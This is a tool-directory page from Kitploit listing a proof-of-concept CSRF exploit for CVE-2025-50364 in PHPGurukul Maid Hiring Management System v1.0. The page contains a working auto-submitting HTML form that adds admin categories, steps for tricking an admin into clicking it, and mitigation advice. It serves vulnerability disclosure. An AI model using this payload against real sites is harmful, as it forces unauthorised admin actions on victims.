Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Proof-of-concept CSRF exploit targeting CVE-2025-50364 in PHPGurukul Maid Hiring Management System v1.0 that adds arbitrary admin categories via a crafted HTML form. | Kitploit
Tools/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Proof-of-concept CSRF exploit targeting CVE-2025-50364 in PHPGurukul Maid Hiring Management System v1.0 that adds arbitrary admin categories via a crafted HTML form.

View Repository
11 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Project Name & Repo URL: Maid Hiring Management System using PHP and MySQL

Vulnerability Type: Client Side Request Forgery

Affected Version(s): v1.0

💣Vulnerability Description: A Cross-Site Request Forgery (CSRF) vulnerability exists in the admin panel of PHPGurukul Hiring Management System, allowing an attacker to add arbitrary hiring categories by tricking an authenticated admin into visiting a malicious site. This can lead to data pollution and unauthorized admin-level changes.

👩‍💻Impact: Unauthorized category creation

🛜Proof-of-Concept (PoC) 1)There was a category add functionality where only authenticated admin can add category. 1 2)HTML code to send POST request to the endpoint /admin/add-category.php CSRF-POC 2

root@kitploit:~
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

3)Use the HTML code and craft a malicious URL. 3 4)After Admin clicks on the link, new category will be added. 4 5

Recommendation: Implement of CSRF tokens in admin forms, enforce SameSite cookies, and validate request origin to prevent unauthorized actions.

Download Tool